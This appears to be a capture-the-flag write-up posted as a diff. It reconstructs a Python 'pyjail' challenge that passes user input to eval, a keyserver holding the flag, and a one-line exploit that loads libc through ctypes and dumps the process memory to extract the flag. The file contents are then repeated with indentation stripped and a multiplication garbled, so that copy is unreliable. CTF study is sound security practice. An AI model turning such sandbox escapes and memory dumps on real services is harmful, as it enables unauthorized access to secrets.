tyrion · August 29, 2015 14:10
diff --git a/fuckpyjails.py b/fuckpyjails.py
 #!/usr/bin/env python
 import sys
 import socket
 import resource

 resource.setrlimit(resource.RLIMIT_NPROC, (0, 0))

 def get_key():
  s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
  s.connect("/tmp/keyserver")
  r = s.recv(64)
  s.close()
  return r

 sys.stdout.write(">>> ")
 sys.stdout.flush()

 if get_key() is eval(raw_input()):
  print "Did you get the key?"
 else:
  print "Fail!"
diff --git a/keyserver.py b/keyserver.py
 #!/usr/bin/env python
 # Note: this is not the original server of the challenge.
 # I wrote this trying to guess how the original might have been 

 import os
 import struct
 from socket import socket, AF_UNIX, SOCK_STREAM, SOL_SOCKET

 SO_PEERCRED = 17 # Pulled from /usr/include/asm-generic/socket.h
 SOCKFILE = '/tmp/keyserver'
 FLAG = '9447{seriously_eval_is_lame}'

 if os.path.exists(SOCKFILE):
    os.remove(SOCKFILE)

 seen_pids = set()
 s = socket(AF_UNIX, SOCK_STREAM)

 s.bind(SOCKFILE)
 #s.setblocking(0)
 s.listen(1)

 def get_pid(conn):
    # See: http://stackoverflow.com/a/7982749/641317
    creds = conn.getsockopt(SOL_SOCKET, SO_PEERCRED, struct.calcsize('3i'))
    pid, uid, gid = struct.unpack('3i',creds)
    return pid


 while True:
    conn, addr = s.accept()
    pid = get_pid(conn)
    if pid in seen_pids:
        message = 'I already sent you the key, stupid!'
    else:
        seen_pids.add(pid)
        message = FLAG

    try:
        conn.send(message)
    except Exception as e:
        print(pid, e)
diff --git a/solution.sh b/solution.sh
 echo "(lambda c: (lambda libc: libc.write(1, c.c_char_p(id('hello') - 100024), 1024*1024*100))(c.cdll.LoadLibrary('libc.so.6')))(__import__('ctypes'))
 " | python fuckpyjails.py | strings | grep 9447
	#!/usr/bin/env python
	import sys
	import socket
	import resource

	resource.setrlimit(resource.RLIMIT_NPROC, (0, 0))

	def get_key():
	s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
	s.connect("/tmp/keyserver")
	r = s.recv(64)
	s.close()
	return r

	sys.stdout.write(">>> ")
	sys.stdout.flush()

	if get_key() is eval(raw_input()):
	print "Did you get the key?"
	else:
	print "Fail!"
	#!/usr/bin/env python
	# Note: this is not the original server of the challenge.
	# I wrote this trying to guess how the original might have been

	import os
	import struct
	from socket import socket, AF_UNIX, SOCK_STREAM, SOL_SOCKET

	SO_PEERCRED = 17 # Pulled from /usr/include/asm-generic/socket.h
	SOCKFILE = '/tmp/keyserver'
	FLAG = '9447{seriously_eval_is_lame}'

	if os.path.exists(SOCKFILE):
	os.remove(SOCKFILE)

	seen_pids = set()
	s = socket(AF_UNIX, SOCK_STREAM)

	s.bind(SOCKFILE)
	#s.setblocking(0)
	s.listen(1)

	def get_pid(conn):
	# See: http://stackoverflow.com/a/7982749/641317
	creds = conn.getsockopt(SOL_SOCKET, SO_PEERCRED, struct.calcsize('3i'))
	pid, uid, gid = struct.unpack('3i',creds)
	return pid


	while True:
	conn, addr = s.accept()
	pid = get_pid(conn)
	if pid in seen_pids:
	message = 'I already sent you the key, stupid!'
	else:
	seen_pids.add(pid)
	message = FLAG

	try:
	conn.send(message)
	except Exception as e:
	print(pid, e)
	echo "(lambda c: (lambda libc: libc.write(1, c.c_char_p(id('hello') - 100024), 10241024100))(c.cdll.LoadLibrary('libc.so.6')))(__import__('ctypes'))
	" \| python fuckpyjails.py \| strings \| grep 9447